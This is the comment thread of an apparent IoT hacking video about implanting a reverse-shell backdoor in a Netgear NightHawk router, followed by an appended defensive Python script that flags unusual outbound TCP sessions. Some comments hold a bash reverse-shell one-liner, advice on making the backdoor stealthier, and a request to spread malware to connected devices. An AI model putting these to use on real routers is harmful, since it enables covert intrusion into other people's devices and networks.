IoT Hacking - Netgear AC1750 NightHawk - Backdoor Reverse Shell

Comments • 43

  • @cocusar
    @cocusar 5 months ago +12

    I'd do this just for the laughs, but my hoarding doesn't let me throw away this kind of devices because "you might need it some day" lol

  • @garridomonfrero
    @garridomonfrero 5 months ago +6

    It would be so cool if, instead of overwriting another binary from the firmware, you unpacked the firmware, rewrote it, packed it again, generated the CRC and flashed it onto the hardware. Nice video man!

  • @3dlifestyle768
    @3dlifestyle768 2 months ago +2

    Awesome, awesome, awesome! One thing that comes to my mind is: what if you created an executable bash script with the name aws_json? Inside it, run both the real aws_json binary and the reverse shell. Also, in case aws_json gets executed multiple times, check in the bash script with ps whether the reverse shell is already running, so it starts only once.
    Much respect Matt!

  • @thedizsilent5188
    @thedizsilent5188 5 months ago +3

    I've needed to cross compile pkgs from x86 to ARM for my Raspberry Pi 4 and failed miserably, got uninterested and gave up. I learned a lot from this, thank you.

  • @theskelet4r
    @theskelet4r 5 months ago +2

    Another Amazing Video Matt, Thank you for sharing your skills with the community

  • @NewbLuck
    @NewbLuck 4 months ago +2

    The Zig compiler is an awesome tool for C/C++ cross-compiling, it has GCC+MUSL baked in and supports pretty much any arch LLVM does. Much easier than maintaining various CC tool chains (and is a great systems language to boot).

  • @feff6754
    @feff6754 5 months ago +3

    Love this series of videos, thanks!

  • @Mimo0xCool
    @Mimo0xCool 5 months ago +3

    Keep it up, thank you for the well done content 🙏

  • @russjr08
    @russjr08 5 months ago

    Great work Matt, I really enjoy going through these!

  • @SteltekOne
    @SteltekOne 5 months ago +2

    19:30 That's actually a typical firmware recovery process for when you've bricked your firmware with an update. The goal is to let you flash back a valid firmware that way. (Many manufacturers lock this behind a button press, but some will just initiate it on boot as seen. Ideally there's also a signature check to ensure it only loads valid firmware from the manufacturer, but few go that far.)

  • @zekebohannon6058
    @zekebohannon6058 5 months ago

    This was an awesome video. First time I've seen your channel, subscribed.

  • @SiegeX1
    @SiegeX1 2 months ago

    Although you did say this would be a simple reverse shell, the right way to do this would be to have your code fork() and call your socket code asynchronously, then have the parent process fork() again to call aws_json.
    Next, modify your socket code to put a check up front to see if port 1234 is already bound; if so, return, otherwise set up the reverse shell.
    Now you have a pretty stealthy back door where the functionality doesn't change.
    For extra bonus points you can embed the binary bytes of aws_json into the source code of your backdoored aws_json and then extract those bytes to a RAM disk and execute it there.

  • @ejennings98
    @ejennings98 5 months ago

    Awesome video, clear and concise

  • @tonkofonko
    @tonkofonko 5 months ago

    Looks so good when it can be modified with a backdoor or that kind of stuff.

  • @stanislavsmetanin1307
    @stanislavsmetanin1307 2 months ago +1

    Highly educational, and also HIGHLY entertaining!! Great job.
    🤝
    Would be nice to see smart TV hacking.
    😃
    Regards..

    • @mattbrwn
      @mattbrwn 2 months ago

      I have a TCL TV which is notoriously bad, but family would not be happy with me if it was in pieces on my desk XD

    • @stanislavsmetanin1307
      @stanislavsmetanin1307 2 months ago

      @@mattbrwn 😄 ye, understandable..

  • @renify_
    @renify_ 5 months ago

    Thanks Matt, I would never buy a resold modem anymore 🤣

  • @ItsAuver
    @ItsAuver 5 months ago +1

    Thanks for another video Matt! Question, would this kind of reverse shell survive the device being factory reset? I imagine it would not, but I am unsure. Thanks again!

    • @mattbrwn
      @mattbrwn 5 months ago +2

      Probably not, but it could be possible to modify part of the factory reset logic to maintain the backdoor. All depends on how the FR is implemented.

    • @mainarbor8416
      @mainarbor8416 5 months ago

      Sorry for the comment piggyback. What if you bought a new chip, rewrote the ROM, then soldered your custom chip to the board?

  • @gergopap7207
    @gergopap7207 5 months ago +2

    Hi, I would like to ask if there will be a video where you present a binary reverse engineering process and a binary exploitation / exploit development process on the MIPS or ARM architecture?

    • @mattbrwn
      @mattbrwn 5 months ago +1

      Yes, I'm hoping to do some binary RE videos here in the future.

  • @AustinHypes
    @AustinHypes 4 months ago

    Great work

  • @0xracerboy
    @0xracerboy 23 days ago

    This Hard!

  • @NaitmalekYoussef
    @NaitmalekYoussef 5 months ago +1

    keep going 👍🏻

  • @alexk4894
    @alexk4894 4 months ago

    What's the purpose of renaming root to admin? Is it used for authentication via web UI?

  • @eeee-xq6qz
    @eeee-xq6qz 5 months ago +1

    Looking forward to the Discord community 😊

  • @mmkf
    @mmkf 5 months ago

    I think the 15 second wait to try and boot firmware over ethernet is to unbrick a router.

  • @patrick1020000
    @patrick1020000 5 months ago

    Does your new aws_json hang the boot process, or does it just happen at the end? Nothing appeared in the logs after your reverse shell ran.

    • @mattbrwn
      @mattbrwn 5 months ago

      It just happens at the end

    • @massimilianogilli1164
      @massimilianogilli1164 4 months ago

      @@mattbrwn What process did you go through to select that one exactly? Would a reverse code that first calls the original aws_json (renamed) and then opens the socket be better?

  • @barclay6172
    @barclay6172 3 months ago

    Is there a way I can hack my $400 Nighthawk X4S to use it without having to pay Netgear for a subscription service?

    • @mattbrwn
      @mattbrwn 3 months ago

      What feature requires a subscription??

  • @szyszqu
    @szyszqu 5 months ago

    And how are we supposed to know what's the IP address of the victim?

    • @jesusderechte3889
      @jesusderechte3889 5 months ago

      Wdym? You don't need the IP of the victim. For the reverse shell you enter your own.

    • @kasterby
      @kasterby 4 months ago

      The victim connects to the hacker's server; the hacker doesn't need to know the client IP, in the same way a website doesn't need to know who you are before you connect to / load a website.

  • @tonkofonko
    @tonkofonko 5 months ago

    But is it possible to automatically install a .apk or .exe file or something else, to install a malicious file on all devices connected to the wifi router and take full control using that router, and is it possible when I use Python on my router?
    Thx bye.

    • @yes-d1d
      @yes-d1d 5 months ago

      🤡🤡

  • @justbendev2324
    @justbendev2324 5 months ago +1

    Nice vids, but damn bro, you speak so slowly it's crazy :D. At 1.5x speed you sound normal x)

  • @_hackwell
    @_hackwell 5 months ago

    I just love the good old bash -i >& /dev/tcp/10.10.14.x/1234 0>&1 if bash is there of course...
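The comments above from @SiegeX1 (a backdoor that checks whether port 1234 is already bound before connecting out) and @_hackwell (the `bash -i >& /dev/tcp/...` one-liner) describe the same artifact from the defender's side: an established TCP connection from the router to an unusual remote port, owned by a process that has no business talking to the network. The script below is an added example, not code from the video or from any commenter. It parses the Linux `/proc/net/tcp` text format that busybox-based routers expose, separates inbound sessions (local port is one the box is listening on) from outbound ones, flags outbound sessions whose remote port is outside an allow-list, and maps the socket inode back to the owning process through `/proc/<pid>/fd`. The sample table is constructed; the allow-list, the little-endian default (ARM and little-endian MIPS write IPv4 addresses byte-reversed in `/proc/net/tcp`; big-endian MIPS does not), and the address `10.10.14.14:1234` are assumptions for the example.

```python
"""Flag established outbound TCP sessions to ports outside an allow-list.

Added example (not from the video or its comments). Reads the Linux
/proc/net/tcp text format and maps socket inodes to processes.
"""
import os
import socket

TCP_ESTABLISHED = "01"   # st column value for ESTABLISHED
TCP_LISTEN = "0A"        # st column value for LISTEN

# Constructed sample resembling /proc/net/tcp on a little-endian router:
#   row 0: httpd listening on :80
#   row 1: outbound session from an ephemeral port to 10.10.14.14:1234
#   row 2: inbound session from a LAN client to the web UI on :80
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0 100 0 0 10 0
   1: 0101A8C0:B3F2 0E0E0A0A:04D2 01 00000000:00000000 00:00000000 00000000     0        0 9876 1 0 100 0 0 10 0
   2: 0101A8C0:0050 6401A8C0:D431 01 00000000:00000000 00:00000000 00000000     0        0 5555 1 0 100 0 0 10 0
"""


def decode_addr(field, little_endian=True):
    """Turn 'HEXIP:HEXPORT' into ('a.b.c.d', port). The kernel prints the
    IPv4 address in host byte order, so little-endian hosts need a reverse."""
    hexip, hexport = field.split(":")
    raw = bytes.fromhex(hexip)
    if little_endian:
        raw = raw[::-1]
    return socket.inet_ntoa(raw), int(hexport, 16)


def parse_proc_net_tcp(text, little_endian=True):
    """Parse the table into dicts with local, remote, state and inode."""
    entries = []
    for line in text.splitlines()[1:]:      # skip the header row
        fields = line.split()
        if len(fields) < 10:
            continue                        # malformed or truncated row
        entries.append({
            "local": decode_addr(fields[1], little_endian),
            "remote": decode_addr(fields[2], little_endian),
            "state": fields[3],
            "inode": int(fields[9]),
        })
    return entries


def suspicious_outbound(entries, allowed_remote_ports=frozenset({53, 80, 123, 443})):
    """Established sessions that are outbound (local port is not a listener)
    and whose remote port is not on the allow-list (assumed list)."""
    listening = {e["local"][1] for e in entries if e["state"] == TCP_LISTEN}
    flagged = []
    for e in entries:
        if e["state"] != TCP_ESTABLISHED:
            continue
        if e["local"][1] in listening:
            continue                        # inbound to a service we run
        if e["remote"][1] in allowed_remote_ports:
            continue
        flagged.append(e)
    return flagged


def inode_owner(inode, proc_root="/proc"):
    """Find (pid, comm) whose fd table holds 'socket:[inode]', else None.
    Tolerates a missing /proc and processes that exit mid-scan."""
    target = f"socket:[{inode}]"
    try:
        pids = [p for p in os.listdir(proc_root) if p.isdigit()]
    except OSError:
        return None
    for pid in pids:
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            continue
        for fd in fds:
            try:
                if os.readlink(os.path.join(fd_dir, fd)) == target:
                    with open(os.path.join(proc_root, pid, "comm")) as fh:
                        return int(pid), fh.read().strip()
            except OSError:
                continue
    return None


def report(text=SAMPLE_PROC_NET_TCP, little_endian=True, proc_root="/proc"):
    """One line per flagged session: local -> remote and the owning process."""
    lines = []
    for e in suspicious_outbound(parse_proc_net_tcp(text, little_endian)):
        owner = inode_owner(e["inode"], proc_root)
        who = f"pid {owner[0]} ({owner[1]})" if owner else f"inode {e['inode']} (owner not found)"
        lines.append(f"{e['local'][0]}:{e['local'][1]} -> {e['remote'][0]}:{e['remote'][1]} {who}")
    return lines


if __name__ == "__main__":
    for line in report():
        print(line)
```

On a real box replace the constructed sample with `open("/proc/net/tcp").read()` and pass `little_endian=False` on big-endian MIPS; the inode-to-process mapping only works when run on the device itself (or against a copied `/proc` tree), which is why `report()` degrades to reporting the bare inode when the owner cannot be found.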